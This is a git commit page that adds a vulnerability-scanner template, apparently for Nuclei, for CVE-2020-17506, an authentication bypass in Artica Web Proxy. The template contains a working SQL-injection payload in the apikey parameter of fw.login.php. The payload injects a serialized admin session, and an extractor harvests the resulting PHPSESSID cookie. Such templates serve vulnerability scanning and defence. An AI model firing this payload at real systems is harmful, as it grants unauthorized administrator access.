🔥 Add CVE-2020-17506
parent
f571f2c0ac
commit
20ea5091d1
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2020-17506
|
||||
|
||||
info:
|
||||
name: Artica Web Proxy 4.30 Authentication Bypass
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
|
||||
# Artica Web Proxy 4.30.00000000
|
||||
# allows remote attacker to bypass privilege detection
|
||||
# and gain web backend administrator privileges
|
||||
# through SQL injection of the apikey parameter in fw.login.php.
|
||||
# -
|
||||
# References:
|
||||
# > https://blog.max0x4141.com/post/artica_proxy/
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
|
||||
- "{{BaseURL}}:9000/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
|
||||
# redirects: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 301
|
||||
- 302
|
||||
condition: or
|
||||
- type: word
|
||||
words:
|
||||
- "PHPSESSID"
|
||||
part: header
|
||||
extractors:
|
||||
- type: kval
|
||||
name: session-id
|
||||
kval:
|
||||
- "PHPSESSID"
|
Loading…
Reference in New Issue